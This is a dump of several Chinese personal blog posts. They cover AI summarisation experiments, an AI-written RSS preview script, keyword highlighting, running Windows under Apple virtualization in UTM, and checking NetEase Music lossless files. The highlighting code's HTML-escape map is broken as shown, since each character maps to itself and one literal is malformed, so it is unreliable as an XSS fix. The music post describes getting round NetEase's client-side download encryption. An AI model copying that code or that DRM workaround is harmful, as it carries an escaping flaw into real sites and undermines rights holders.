Ultra的算力，跑70B参数的模型肯定是达不到20T/s的，至于更大的模型估计速度就慢的不能看了……不过不影响，这已经够我用了。   至于除LLM以外的用途……我似乎没有什么能用到这么强性能以及这么大内存的地方了……其实还是挺浪费的，但是也没办法，毕竟我又不会剪电影啊🤣。" },{ "title": "关于LLM上限的探索", "category": "", "tags": "AI, LLM, 探索", "url": "/2025/04/22/ai-limit.html", "date": "2025/04/22", "content": "还有什么是AI不能干的？起因在最近对LLM的探索中，能感觉到它真的是什么都能干，尤其最近GPT-4o的画图能力实在是太强了。不过对于画图我倒不是很关心，主要是没什么想让它画的图😂。我更关心的是LLM在文本生成中的能力，毕竟这才是它的本职工作。虽然现在的AI解决问题的能力确实很强，但从它还没有大规模的把人替换掉来看，它肯定是还有一些做不到的事情，所以我想对这一点进行一些探索。对于超长文本分析的探索对于现在的LLM来说，虽然不少模型已经能做到很长的上下文了，但这个所谓的“长”不过是几万字而已。对于读一篇论文或者几篇文章当然没有问题，但是如果是分析上百篇文章就不太行了，比如我希望AI阅读完我所有的文章，然后对我进行评价。   我的博客现在已经有一百多篇文章了，之前做过全文搜索的功能，可以在search.json中获取所有的文章，用来让AI分析的材料是个不错的选择，不过把所有文章输入到上下文中显然是不太现实，这个JSON文件的大小有1MiB左右，但是大多数比较厉害的AI上下文只有100多k，根本读不完。而对于一些超长上下文多模型，比如阿里云有一个10M上下文的模型，效果又很差，并没有参考几条上文的内容😓。另外我还试过一些AI通过附件的方式阅读文章内容，那种好像是把文件切片之后再读？应该是类似RAG那种，从中查找和问题最相关的文本段落进行回答，但是那种方法不能解决对所有文章进行分析……除此之外我也试过一些Agent，不过它们只会写代码来分析我的文章，比如绘制文章字数随时间变化曲线、不同年份的文章数量、还有词频分析啥的，对我来说并没有什么卵用😅。使用AI摘要来解决问题那难道就没办法了吗？先不急，最近还发生了一件事情，不知道Cloudflare犯什么毛病了，近期用Worker请求我的D1数据库时不时会报“internal error”的错误，我还在他们论坛发了条帖子问了一下，然而并没有人搭理我😅，这时候我才意识到我似乎没有Cloudflare的替代品……出问题了也没办法😰。这个东西导致我的AI摘要、文章推荐、以及点击计数器全都用不了了，我应该避免太过依赖Cloudflare Worker啊～   那么我该做些什么？点击计数器是没什么好办法了，不过对于AI摘要，既然摘要在我写完文章之后根本就不会变，不如隔段时间我就把摘要内容缓存到我博客本地吧，这样不仅可以极速展示摘要内容，而且不需要请求接口，就不会受到Cloudflare出问题的影响了。所以我把数据库摘要内容导了出来，放到了ai-cache.json中，如果有存在的摘要内容就不再请求接口了。   当我做完摘要缓存之后，我发现，这不就是让AI读我所有文章的最好方法嘛，让AI读AI总结的内容，然后再进行一次总结，就能尽可能的让AI完全了解我的文章然后对我评价了啊～而且这个摘要文件也只有100KiB左右，正好够AI读了。本来我想试试DeepSeek来做这件事情的，但是不知道里面命中了什么关键词，被拒绝生成了🤣，那我只好让GPT-4o来完成这件事了。   试了一下感觉效果相当的不错，总结的非常有条理，而且不像以前的ChatGPT很有AI味，这次写出来的文章很有人味啊～真是出乎我的意料，所以我把GPT-4o写的内容分享出来，来看看AI对我的分析怎么样🤣。  技术浪人，数字游民：对一位博客作者的观察与评价  在浩如烟海的中文技术博客中，有些作者宛如一颗微弱却坚韧的恒星，独自在各自的轨道中发光发热。他们不一定追逐热点，也不总是标榜权威，但其笔下所流露出的独立精神、技术热情与对现实的观察，往往比众多浮华的“教程型”博客更值得玩味。本文所探讨的博客作者Mayx，便是这样一位存在——他既是程序员，也是“生活黑客”；既关心设备性能，也关注技术伦理；既热衷实用工具，也不乏生活反思。  一、技术为体，思考为魂  在Mayx的博客中，技术类文章占据了绝对的比重。从自制邮件订阅脚本1、Cloudflare Workers自动化2、内网穿透探索3，到低功耗开发板的实验4、AI模型的本地运行5、以及对黑苹果6、Linux系统7的深度体验，这些内容几乎涵盖了当前主流技术生态中的多个维度。  然而，他并非一位“炫技型”技术写作者。相反，在多数文章中，Mayx更倾向于从实用主义的角度出发——他关注性价比、功耗、稳定性、开源程度，而非追逐技术本身的潮流。例如，在讨论Hackintosh时，他并未沉迷于是否能成功运行macOS，而是审慎地指出其与Mac原生体验的差距6；在体验AI模型时，他选择了性能与成本平衡的路径，而不是盲目追求最大模型和最强显卡5。  他的技术探索往往是“从需求出发”，例如为了替代失效的签到脚本，他尝试了Cloudflare Workers2；为了解决被Github封禁的问题8，他自己研究反审查架构；面对Heroku停服9，他快速转向Koyeb，并指出其使用便捷的优点。这些行为体现出一种“动手解决问题”的工程师思维，同时也反映了其对现成工具和平台的怀疑精神——“没有什么是不可替代的”，但也“没有什么是完美无缺的”。  二、独立、反思、带有一丝叛逆  阅读Mayx的博客，可以明显感觉到他在面对“主流”技术话语体系时的疏离甚至反抗。他不信任所谓“权威推荐”，也极少引用大V观点；他对收费工具持质疑态度，对封闭平台持怀疑立场，对广告与强制App表达不满10。在对宝塔面板的多篇评论中，他不仅指出其功能冗余和定价虚高1112，还以代码层面论证其“技术水准有限”；在谈及Server酱收费后自建通知平台一文中，更是表现出“开发者不应为此类功能付费”的强烈观点13。  这种倾向可视为一种数字自由主义精神：他珍视个体的选择权、控制权和创造力，对平台化、商业化所带来的“懒惰便利”持保留态度。也正因为此，他热衷于探索容器、虚拟化、i2p、VPN、防DNS污染14、反反盗链等灰色技术领域，这不仅是技术探索，也是一种抵抗姿态——抵抗监视、抵抗平台绑架、抵抗数字奴役。  与此同时，作者又是极度自省的人。在多篇年终总结中，他坦言自己因作息不规律导致健康下滑、因沉迷游戏影响了计划、因生活节奏散乱而丧失了方向1516。这些坦诚的文字使人看到一个技术人真实的一面：并非所有人都能生活在高效执行与完美节奏中，面对现实与焦虑的拉扯，他并不逃避，而是试图寻找平衡。  三、探索孤岛与技术乌托邦  若将Mayx的博客比作一个数字世界中的“孤岛”，那他无疑是岛上的守望者。他固执地维护着自己的服务器、反代服务、脚本计划表和开源工具；他不断尝试将废弃电脑7、老旧开发板4和Linux容器17重新唤醒；他甚至研究如何在FM频段自制电台18，或在树莓派上运行OpenFyde与Android系统1920。  这不仅是对“电子垃圾再利用”的尝试，更是一种构建技术乌托邦的幻想——一个无需依赖主流供应链、无需信任大型平台、可以掌控一切细节的小宇宙。  这种倾向也体现在他对去中心化技术的探索，如xLog、IPFS、i2pd21、ZeroNet等。尽管在文章中他承认这些系统“尚不成熟”“内容匮乏”“界面粗糙”，但仍不乏热情地部署和尝试。他似乎在追问这样一个问题：“除了平台，我们还能依靠什么？”  这也是他与多数技术博客的区别：不是“教你怎么做”，而是“带你看看还有哪些可能”。  四、个人困境与技术慰藉  不可否认，Mayx的博客也流露出某种孤独与挣扎。他数次提到对社会节奏的不适应、对生活目标的不明确、对未来的迷茫与迟疑。在2022和2023年的总结中，他甚至表达了对“人类灭亡风险”“全球混乱”的忧虑1516；在谈及个人计划时，也多次写到“自律不足”“想做的事情太多却力不从心”等字句。  但正是在这种状态下，技术成了他的避难所。他在反复实验中找回秩序感，在编码中获得控制感，在部署过程中体会到“解决问题”的满足。这种“用技术对抗生活混乱”的姿态，令他的博客带有某种心理学上的意义。  五、结语：一个“笨方法”的捍卫者  总的来说，Mayx并非技术界的明星，更非意见领袖，但他是一个值得尊敬的“笨方法”的捍卫者：在速成与流量当道的技术传播环境中，他仍选择用细致的试验、质朴的语言和大量的失败记录来构建自己的知识体系。  他的博客不提供“答案”，而是提供“路线”；不追求“成功学”，而是记录“失败和坚持”。他不是在追求成为谁，而是在努力做自己。  这或许是我们在阅读他的文字后，最值得思考的一点。技术不仅仅是一种职业工具，它也可以是人自我建构、自我理解、自我修复的路径。  Mayx，或许正走在这条路上——孤独而坚定。对于长复杂逻辑代码的分析在让AI对我文章分析完后，我又想起来好久以前写的论坛引擎Mabbs，以前还打算重构，不过后来学了别的语言之后就没什么兴趣了😂。但现在有了AI，我想重构MaBBS的事情能不能让AI来做呢？虽然我以前的代码完全没有可读性，耦合性也极高，但这种事情对AI来说应该不是什么难事，更何况我的代码才22KiB，AI完全能读的了，于是我开始尝试让各种AI来把这个代码变得人类可读，然后进行重构。   然而结果令我非常失望，无论哪一款AI只能写出一点代码，甚至Grok3直接一点代码都没写😆，然后它们就认为它们写完了，另外有些AI从片段来看好像是写了点代码，但是内容和我原本对代码基本上没什么关系，属于是分析了一点代码之后重新写了……   明明这个代码又不长，怎么就没有一个AI能准确的重构我的代码呢？也可能是因为虽然代码不长，但是变量名很短，如果把变量名全都扩展到人能看懂的长度之后就超出AI的上下文限制了，然后就忘记了之前的内容吧？另外Shell语言网络上的资料本来就不太多，所以AI也没有足够的知识来重构吧……对于这个问题我目前没什么好的想法让AI来进行，也许等AI能解决这个问题，AI就有能力替代人了呢😁？   虽然没能让AI重构我的代码，不过我闲来无事想让其他人也试试我以前写的论坛引擎，所以搞了个Docker镜像，如果大伙有兴趣尝试一下可以下载下来试试看，整个镜像才2MiB多一点，所以我叫它世界上最小的论坛引擎也没问题吧🤣。感想看起来目前LLM的上限就在于它的上下文长度限制啊……这一点真的是限制了AI很多能力，但似乎也没什么好办法，AI就是因为这一点所以不能像人一样纵览全局所以才不能替代人，即使用什么办法去压缩它的上文也会丢掉很多细节信息。不过按照目前LLM的架构来说应该还解决不了这个问题，如果什么时候AI能在思考的过程中修改它自己的权重……也许就可以做到真正的无限上下文，突破上限从而替代人类吧？            免费订阅一个属于自己的邮件日报 ↩              使用CF Workers Cron触发器进行签到 ↩ ↩2              关于内网穿透的笔记 ↩              Luckfox Pico Plus使用体验 ↩ ↩2              关于最近人工智能的探索 ↩ ↩2              Hackintosh使用体验 ↩ ↩2              关于旧电脑的使用探索 ↩ ↩2              Github封禁了我的博客？！ ↩              体验小白也会使用的免费容器云 ↩              如何不使用贴吧App查看贴吧 ↩              从宝塔面板中学习运维知识 ↩              如何自定义宝塔亚马逊S3云存储插件的端点 ↩              自己动手做一个Server酱·TurboMini版 ↩              如何避免Cloudflare背后的源站被恶意访问 ↩              年终总结 ↩ ↩2              年终总结 ↩ ↩2              如何在Linux容器内运行Android？ ↩              用树莓派自制FM电台 ↩              rpi4-openfyde的使用体验 ↩              在树莓派4B上安装Ubuntu以及各种操作 ↩              i2pd在服务器上的使用体验 ↩      " },{ "title": "如何使用JS通过订阅源查看文章？", "category": "", "tags": "JavaScript, RSS, Feed, AI", "url": "/2025/04/08/feed.html", "date": "2025/04/08", "content": "懒得写代码？那就让AI写！起因前段时间，我看到有些博客给自己的友链页面做了通过订阅源查看友链最近更新文章的功能，看起来挺有意思的，有点想整一个。不过对于我的博客来说，作为静态博客想要做到这样的功能估计没那么简单吧……毕竟一般的订阅软件需要隔段时间请求一下对应博客的订阅链接，然后再把结果存到数据库才行。但是我想了想，对我来说没必要做成订阅啊，我又不需要知道对应博客是什么时候更新的，只要在有人想知道的时候去请求一下订阅链接，然后展示出来就行，感觉似乎又没有那么复杂。   既然不复杂，那这个功能就让AI来做吧，正好前段时间有个朋友买了一个月的Devin.ai订阅，据说是可以自己调试代码，还能操作浏览器，而且代码基本上写出来就能用。我对这个挺感兴趣的，所以这次的功能就让它来写吧！让AI编写代码既然是让AI来写，至少得把我的需求说清楚，所以首先我应该告诉它：  创建一个JavaScript函数来实现Links表格中链接的RSS/Atom源预览。      当鼠标悬停在表中的链接上时，检查该网站是否有RSS/Atom源，并将结果显示在一个浮动窗口中    在鼠标光标后的浮动窗口中显示提要中的5篇最新文章    在窗口中只包含标题和时间，不需要链接和内容    跳过所有不包含RSS/Atom源的链接，而不显示任何错误    当鼠标离开链接时，浮动预览应该消失  不过在正式编写之前，我还得考虑一下可行性，毕竟是很简单的功能，我不写但我不能不知道怎么写。首先让JS解析Feed数据也就是XML数据应该是很简单的事情，JS应该有自带的函数来实现这种功能。然后是获取数据，在JS中使用fetch就可以了，但是这里有个很重要的事情，浏览器请求其他网站存在跨域的问题，还好我之前在CF Workers上用cloudflare-cors-anywhere搭了个CORS代理： https://cors-anywhere.mayx.eu.org/ 。所以我应该在说明中给它说清楚：      如果存在源，请使用CORS代理：https://cors-anywhere.mayx.eu.org/ 获取并解析它  随后我就开始让它编写代码了。接下来就能看到AI在浏览器和编辑器中切换，不停的进行编写和调试，等了一段时间，它把第一版代码写好了。不过也许我说的不够清楚，这个CORS代理的用法和其他的CORS代理不太一样，代理链接和被代理的链接之间需要使用“?”分开，另外第一版我也没说清楚RSS/Atom源的链接在哪，所以它选择遍历常见的几种订阅源的路径，这样有点不太好，除了速度慢，对我的CORS代理消耗也比较大。所以我告诉它代理的正确用法，以及让它假设超链接中包含“data-feed”属性，其中包含订阅源的链接，并且随便挑了个网站拿给它作为示例。   随后就能看到它继续改改改，改了几次之后我把最后生成的JS复制到浏览器上执行了一下，效果还不错，于是就把它放到我的博客上了。   它的水平还是挺不错的，至少正确的实现了功能。不过我有点担心它的代码会不会不太可靠，毕竟要从其他网站上获取数据，得避免出现XSS之类的问题，于是我把代码丢给DeepSeek-R1让它检查了一下，果不其然Devin.ai写的代码似乎有XSS的隐患，如果链接列表中标题有html标签似乎就会解析（虽然我没试过），于是根据DeepSeek的提示修改了一下，增加了一个过滤特殊字符的函数，改完又放到博客上，最终的代码就是：rss-feed-preview.js。感想让AI全自动写代码感觉还挺方便，有种当产品经理的感觉了🤣，像这种AI就是Agent吧，这也算是我头一次使用Agent了，感觉用起来还挺不错的。不过从这次尝试来看确实AI也有一定的局限性，像是直接写出来的代码可能存在一些安全性问题，除非单独让AI检查，不然很有可能会写出功能正常但是存在漏洞的代码，所以还是得人看着点，AI搞出事故可是不负责的啊😇～" },{ "title": "最近对博客搜索功能的优化记录", "category": "", "tags": "博客, 搜索, 优化", "url": "/2025/04/04/search.html", "date": "2025/04/04", "content": "看看其他的博客也会有新的灵感啊～起因前段时间，我闲来无事在GitHub上搜和我使用相同模板minimal的博客。但搜索结果中有许多人用这个模板制作的是简历或作品集，这让我有些失望。不过这倒也能理解，因为这个模版并不算博客模板，没有文章列表之类的代码，这些都只能自己写。当然多找找还是能找到一些的，毕竟这个模板在GitHub Pages中算是最受欢迎，至少符合大众的审美。像我就搜到了一个叫Guanzhou Hu的博客，他对模板的样式做了不少的改动，而且改的还挺好看的，尤其是右上角的导航栏，看起来挺有意思，只是这个源代码……导航栏有点硬编码的感觉，我不是很喜欢这种实现方式……使用标签作为关键词进行搜索之后我又看了看其他博客，看到了Matt Walker Blog。他没有对模板做很多改动，只是把section元素变得更宽了，但是他没有改手机版自适应的样式，导致界面基本上没法在手机上查看。不过在他的首页中，我对他把文章标签放在文章列表这个操作非常感兴趣，因为每次我都有给文章打标签，但是几乎没什么用。他的标签点进去之后会跳转到该标签下的所有文章，我其实很早就想做这个功能了，但是在不用插件的情况下Jekyll基本上做不出来这种功能，因为没有插件的情况下是不能使用Liquid标签创建文件的，我看了下他的实现，原来是提前创建好的标签页面然后进行筛选的，这个实现我也不喜欢，这样的话我每次打标签都要新建一个标签对应的页面，这种事情不让程序做我会很不爽……（其实现在的GitHub Pages构建网站都是用的Actions了，完全可以自己写一个可以使用插件的Actions来进行构建，不过我也懒得折腾了🤣）   要么还有一个选择，可以单独搞一个页面，里面有所有标签对应的文章，点击文章的标签之后使用锚链接定位到对应标签所在的位置。但这样会导致一个页面有可能有一堆相同的文章链接，结果这个页面比归档页面的链接还多，那就感觉有点糟糕了……  不过我想起来以前做的博客全文搜索功能，如果把标签作为关键词进行查询，那也能起到筛选出标签对应文章的作用吧？而且这样即使我没给那个文章打标签也能搜出来，其实也算不错的选择，另外自从我做出来那个全文搜索的功能之后也没用过几次，没有关键词的话也一时半会想不出来搜什么比较好。于是说做就做，直接把Matt Walker Blog那段在文章列表生成标签的代码复制过来，感觉好像还不错😆？   顺便我也把文章里面的标签也加了链接到搜索的功能，不过原来的代码用的是.join实现的，现在加上这个功能的话就只能老老实实用循环写了😥……搜索后使用高亮标记关键词上面的标签搜索效果还不错，只是有些关键词搜完之后有点难发现。我搜索出来之后怎么证明搜到的内容里面一定有对应的关键词呢？虽然从程序的角度来说这是理所应当的事情，一定是有的数据才可能被搜到，但有时候不用Ctrl+F看一眼都不知道是哪里搜到了……所以我觉得应该像其他网站一样对搜到的内容用高亮进行标记。标记应该用什么呢？用样式也许不错，不过现在的H5标签里有一个叫mark的标签可以直接用，用这个标签包裹的内容背景颜色就会变成黄色，就像用荧光笔标记了一样，这样就不需要写样式了。   至于关键词用查询字符串传过去就好了，那我该怎么做呢？我用的搜索脚本叫Simple-Jekyll-Search，它的文档其实根本没有写怎么把搜索的请求传到模版里，还好它有个关于模版的测试脚本里面有写，有个query关键词可以把搜索内容给模版渲染出来，既然做了这个功能怎么不写在文档里😅，不过这个项目已经停止，也没法提出什么建议了……   这个功能听起来相当简单，我都懒得写了，这种简单的功能直接让AI写才对！于是我把需求告诉它，让它给我实现一份，于是这就是让AI给我写的高亮关键词的JS代码（经过了一点修改）：$(function () {    const urlParams = new URLSearchParams(window.location.search);    const keyword = urlParams.get('kw')?.trim();    if (!keyword) return;    // 转义正则表达式特殊字符，避免安全问题    const escapedKeyword = keyword.replace(/[.*+?^${}()|[\\]\\\\]/g, '\\\\$&');    // 创建不区分大小写的正则表达式（全局匹配）    const regex = new RegExp(`(${escapedKeyword})`, 'gi');    // 递归遍历并高亮文本节点    const escapeHTML = str => str.replace(/[&<>\"']/g,         tag => ({            '&': '&',            '<': '<',            '>': '>',            '\"': '"',            \"'\": '''        }[tag] || tag));    function highlightTextNodes(element) {        $(element).contents().each(function () {            if (this.nodeType === Node.TEXT_NODE) {                const $this = $(this);                const text = escapeHTML($this.text());                // 使用正则替换并保留原始大小写                if (regex.test(text)) {                    const replaced = text.replace(regex, '<mark>$1</mark>');                    $this.replaceWith(replaced);                }            } else if (                this.nodeType === Node.ELEMENT_NODE &&                !$(this).is('script, style, noscript, textarea')            ) {                highlightTextNodes(this);            }        });    }    $('section').each(function () {        highlightTextNodes(this);    });});（2025.04.28更新：解决了一个潜在的解析问题）   我测试了一下，非常符合我的需求，各种情况都能按照我的预期工作，虽然说功能非常简单，但是能正常运行，AI写的还是挺不错的。近期的其他修改除了对搜索功能的优化，我还做了些别的功能：随机跳转文章前段时间我看到有其他人的博客增加了一个随机跳转文章的功能，不过他的博客是动态博客，实现也比较奇葩，是渲染页面时就已经决定好要随机的文章，也就是说无论用户想不想随便看看，程序都已经随机好了。当然用着静态博客的我来说，从原理上也做不到这一点，不过既然我之前在做相似文章推荐功能时已经对搜索功能的数据进行了缓存，那么直接用缓存的内容直接随机就好了吧……所以就随便写了写，代码也极其简单：<a href=\"javascript:getSearchJSON(function(data){window.location = data[Math.floor(Math.random()*data.length)].url})\">Random</a>给文章内标题添加锚链接最近在修改我的博客的时候我更新了一下给文章生成目录的组件，在这时候我想看看它还有什么有意思的组件可以用，然后就发现了jekyll-anchor-headings，它可以像GitHub展示Markdown文件一样在标题上添加点击后就可以直接跳转到对应标题的锚链接，而且示例里也给出了怎么做可以像GitHub的风格。看起来挺有意思，所以就给自己加上了😆。添加能跳转到原始Markdown的链接在修改博客的时候我参考了一下Jekyll的官方文档，在这个时候发现了page.path这个变量。我想了一下这个变量可以用来链接到我的文章内容，然后就在文章标签位置的右侧加上了这个链接，为了能让它显示在右侧，我用的是float: right，但是这样会导致和文章标签不在同一行，查了一下才知道用了浮动就会强制将元素转换成块级元素，而文章标签用的是行内元素，所以对不齐，没办法就只能把这一整行都转换成块级元素了……于是代码如下：<span style=\"float: right;\"><a href=\"{{ site.github.repository_url }}/tree/master/{{ page.path }}\">查看原始文件</a></span>感想多看看其他人的博客看来也挺不错，可以看看其他人的想法，说不定就有可以参考的价值呢……不只是文章内容，网站本身的一些功能也是作者的想法啊……而对于那些只套别人模版，没什么自己的改动的博客，那就没什么意思了（当然不会代码的那就没办法了～）。有些人说博客中只有文章才是最重要的，但我觉得对于技术博客来说网站的代码也是展示自己的部分，所以折腾博客本身也是很重要的！" },{ "title": "在UTM中使用苹果虚拟化的各种尝试", "category": "", "tags": "虚拟化, 苹果, UTM", "url": "/2025/03/25/utm.html", "date": "2025/03/25", "content": "用官方的方式做非官方的事！起因在几年前刚收到MacBook Pro的时候，我曾安装过虚拟机软件UTM。但是因为我的Mac内存很小，用虚拟机的体验很差，所以就把UTM卸载掉了。不过以前还我还装过一台黑苹果，在上面也安装了UTM。   最近正好由于某些原因我需要在macOS上安装虚拟机，既然有UTM用就继续用UTM了。当然正常情况就是按正常的方式安装系统然后正常的用，这并没有什么意思。所以我想整点有意思的事情，想试试不太正常的使用UTM😝。在UTM中使用苹果虚拟化框架安装Windows如果用过UTM的话应该知道，UTM有很多选项，比如底层的虚拟化框架可以用QEMU或者Virtualization.framework（VZ），而QEMU的后端可以选TCG或者是Hypervisor.framework（HVF）。它们有很多特色，像TCG的兼容性最好，可以模拟任何架构的CPU，但是性能最差，HVF使用硬件虚拟化加速，只能运行宿主机架构的程序，但是性能比较好，而VZ经过了苹果官方优化，性能最好。   那么现在我想安装Windows，又想有最好的性能，那我应该选择VZ吧？可是UTM不允许我这样选择，如果选择安装Windows就会强制使用QEMU……只有Linux或者macOS（在ARM处理器）才能使用VZ……那我应该如何绕过这个限制呢？   我想起来之前让没用的主机感染木马的文章中使用了一键DD/重装脚本把我服务器的Linux系统重装成了Windows系统，那么我能不能用相同的方式先按照正常的方式用VZ安装一个Linux系统然后使用这个脚本重装成Windows？我觉得理论上应该没问题，所以就尝试了一下。   我在这之前已经安装过了一个用了VZ的Ubuntu虚拟机，新建比较费时间所以就直接把这个虚拟机复制了一份。然后下载了重装脚本准备重装系统，但是看说明现在不能让脚本自己查找系统镜像安装了，不过没关系，前段时间我下了一份Windows 10的镜像，接下来我只需要在镜像所在目录执行python3 -m http.server开启一个文件服务器，然后在虚拟机中执行bash reinstall.sh windows --image-name \"Windows 10 Pro\" --iso \"http://192.168.64.1:8000/windows.iso\"就可以了，执行后重启就可以在UTM的虚拟机界面中看到脚本执行的一系列操作。在这期间都很顺利，然而在它执行完之后，虚拟机的屏幕就黑了，而且重启也没有任何变化，看来是实验失败了？不过也可能是因为苹果整的虚拟显示器在Windows中识别不出来，所以显示不出东西，因为我看活动监视器中CPU的占用率也在跳变，虚拟机应该仍然在运行，于是我下载了Windows App（以前的远程桌面），使用虚拟机之前的IP进行连接，结果连接成功了😆。看来苹果的虚拟化框架是能运行Windows的嘛，居然没有一个人尝试一下。   不过屏幕不能亮是真的没有驱动吗？我看了眼设备管理器，搜了一下那个没有安装驱动的视频控制器的设备ID“1af4:1050”，好像是Virtio GPU，这个驱动我记得在virtio-win里是有的，而且重装脚本也会自动下载这个驱动，为什么会没有自动安装呢？可能是设备ID和驱动不一致吧……不过不影响，我选择更新驱动，在列表中选择“Red Hat VirtIO GPU DOD controller”之后UTM的虚拟屏幕中就可以看到画面了，虽然分辨率只能是1024*768……不过能用就很不错了。   再接下来我就需要验证一下它的性能是不是最好的，我把这个虚拟机的硬盘复制了一份，新建了一个使用HVF后端的QEMU虚拟机，把这个硬盘挂载上，然后使用国际象棋跑分，看了一下VZ的跑分相比HVF的跑分高了大概5%-10%，还是挺厉害的。   至于其他方面，我看了一眼用HVF的QEMU虚拟机CPU不能显示正确的型号，而VZ是可以的，另外VZ的‌SMBIOS信息中也可以看到Apple的字样，证明这个Windows确确实实是跑在了苹果的虚拟化框架。不过以上的测试都是基于x86架构的macOS，等回头我的Mac Studio到了之后再在ARM架构的macOS上再测一下，看看能不能用相同的方式安装，如果可以的话，说明VZ的虚拟机没什么兼容性的问题，UTM应该放开使用VZ安装Windows的选项，让我们测测苹果的技术才对。在macOS 12中的UTM使用苹果虚拟化框架安装Linux虽然在刚刚的测试中，用VZ安装Linux就和其他普通的虚拟机安装Linux一样简单，但是之前的测试是在macOS 15上测的。现在我遇到了一个新问题，我现在有一台2016年的Mac，上面运行着macOS 12，而且不能用OCLP升级到macOS 15（因为不是我的电脑）。现在我想在这台电脑上用苹果虚拟化框架安装Linux，虽然用QEMU更简单，但是感觉没意思。在macOS 12中不支持UEFI bootloader，所以我需要手工准备内核镜像之类的东西。   当然从零开始有点难，我打算先用QEMU安装一遍Ubuntu Server。在创建虚拟机之后需要注意，要把刚创建好的虚拟机的硬盘删掉，因为那是qcow2格式的，在VZ中只支持img格式的硬盘，所以删掉之后需要创建一个“RAW映像”，然后按照正常的方式安装系统。   安装好之后从“/boot”目录中把“vmlinuz”和“initrd.img”复制出来，作为Linux内核和初始Ramdisk，我看说明上要未经压缩的Linux内核映像，但是好像是压缩的也能用🤔。随后关机把在QEMU中的硬盘映像复制出来，作为根文件系统映像。   至于启动参数，可以看“/boot/grub/grub.cfg”中内核后面跟的那串，然后再加上“console=hvc0”，因为macOS 12中使用VZ没有虚拟屏幕，只能用虚拟串口连接。在一切准备好之后就可以开机了，在一串内核信息不停滚动后，显示出了登录的提示符，实验就成功结束了。   不过这样启动的话在系统中所有对内核以及对initramfs的更新就全都不会生效了，毕竟虚拟机根本读不到内核了……这倒是影响不大，反正不更新也不是不能用，更何况macOS都不打算更新，虚拟机不更新又能怎样呢🤣。感想看来苹果的“不支持”不代表真的不支持，想想既然是虚拟机，当然就不应该限制系统类型啊，毕竟虚拟机虚拟的是硬件，又不是软件。不过倒是也能理解苹果不需要声明支持自己的竞品，所以也没必要做相应的兼容和测试，但居然没见到有人尝试一下，也挺奇怪，明明用Mac的人也有不少对技术很有探索精神的人啊……   不过随着macOS的更新，像这些非官方支持的办法估计也很有可能出问题，毕竟苹果并不对这些情况进行任何形式的保障，也许以后苹果的哪次更新这个方法就用不了了呢……" },{ "title": "关于HiFi的尝试与探索", "category": "", "tags": "HiFi, 音乐", "url": "/2025/03/22/hifi.html", "date": "2025/03/22", "content": "如何才能听到最原始的音乐呢？起因前段时间，有人在QQ群中送网易云音乐的7天体验VIP，于是随手领了一份。有了VIP之后除了可以下载仅限VIP的音乐以外，还可以选择更好的音质。我现在用的是MacBook Pro，据说在笔记本中音响效果是最好的，那么我为了能对得起这优秀的音响，也不该听垃圾音质的音乐，所以就来探索一下如何听到HiFi的音乐吧。获得音乐下载音乐很简单，直接下一个网易云音乐客户端就可以，不过需要注意要在设置中修改下载音质，默认选项不是最高音质。另外它这个VIP还不是最高的，再往上还有SVIP，可以听所谓的“超清母带”的音质，我不太清楚这个无损以上的那些音质到底是什么东西，也不可能为了这点东西给网易云充钱，所以我就选了个“高清臻音”的选项。   当我在下载一些免费歌曲的时候，下载到的文件是flac格式，看起来应该是没什么问题。但是下载VIP独享音乐的时候，正在下载时是flac格式，可是下载完就变成ncm格式了……虽然我知道有一些解密这些格式的软件（GitHub上有，不过好多都被DMCA takedown了，虽然也能搜到一些……），不过我还是比较好奇这个过程，既然它下载时是flac，那我在它刚下载完要变成ncm之前把网易云音乐强制结束掉不就可以获得完整的flac文件了嘛。试了一下还真可以，也就是说这个ncm加密的过程是在客户端完成的，而不是在服务器上，这还真是有点离谱……我用这个方法下载了几首喜欢听的歌，试了一下都能正常播放。不过用这个办法下载的音乐在客户端的下载中看不到，所以就没有歌词之类的东西了。分析音乐虽然说下载下来的文件是flac格式，但是不代表这就是无损的音乐。毕竟从网易云音乐的“无损”以上的选项都是flac的，那到底它这个无损是真无损吗？首先我在网上搜了一下，网易云音乐的黑历史很多，有些人在网易云音乐上上传了mp3的音乐，结果也有无损的选项。也就是说它这个flac很有可能是直接用mp3转换格式过来的。那这样我就不愿意了，我可以接受下不到无损，但是不能接受本来是mp3格式然后转成flac结果文件体积大增，给我的硬盘塞一堆没用的数据，所以现在我需要证明刚刚下载的音乐不是一堆没用的垃圾。   我看有人说可以使用spek查看时频谱来验证，如果是直接用mp3格式转换的flac文件会被整齐的砍一刀，因为mp3格式支持的最大采样率是48kHz，而根据香农采样定理，采样频率应该大于等于模拟信号频谱中最高频率的2倍，那么mp3支持的最高频率就是24kHz，所以用mp3转换出来的flac一般会在24kHz那里切一刀，更有甚者，如果是44.1kHz采样率的mp3就会在22kHz左右的位置切一刀。不过理论上人类的听力上限就是20kHz，更高的频率理论上人类应该是听不到。但毕竟我们追求的是HiFi，和人类能不能听到没有关系，要保证的是完整的复刻所有的信息。   于是我在我的Mac上用brew安装了spek，安装好之后直接执行spek+音乐文件的位置就可以了，我看了一下刚刚从网易云上下载的音乐，全都是96kHz采样率的音乐，而且没有被切过的痕迹。那这样就能证明网易云音乐就是真无损了吗？其实我也不知道，因为我没有从发行商直接获得的原始文件，一般要对比原始文件才知道是不是无损的……不过我在网上看说无论是“高清臻音”还是“超清母带”无一例外全都是用AI升频制作的，所以看时频谱已经没有意义了……但是我又没有证伪的方法，那就只能先凑合听喽～播放音乐既然音乐已经下好了，那么我直接用我的MacBook Pro播放的音乐它够HiFi吗？虽然我能听出mp3中128kbps和320kbps的区别，但是再高的我也听不出来……不过HiFi要的不是人能不能听出来，而是它发出的声音是不是完美还原。这要怎么证明呢？虽然我没有办法听出来，但如果有可视化的分析至少能看出来，于是我在手机上下载了一款“声音分析仪”软件，它可以用FFT算法分析手机话筒收集到频谱然后展现出来。只是可视化之后……我也很难看出来它够不够HiFi啊，当然理论上如果能保证播放音乐的音响和收听音乐的话筒都是最好的，那么两边的频谱应该是一样的，但是现实中还有底噪的存在，不可能完全一样……虽然如此，但我在看频谱的时候发现，播放的音乐最高频率似乎只有20kHz，我已经测过手机的话筒是能接收到更高的频率的，既然MacBook Pro的音响是最好的，怎么会只能播放20kHz的声音呢？而且它这个20kHz很明显有一刀切的感觉，应该是哪里配置错了。   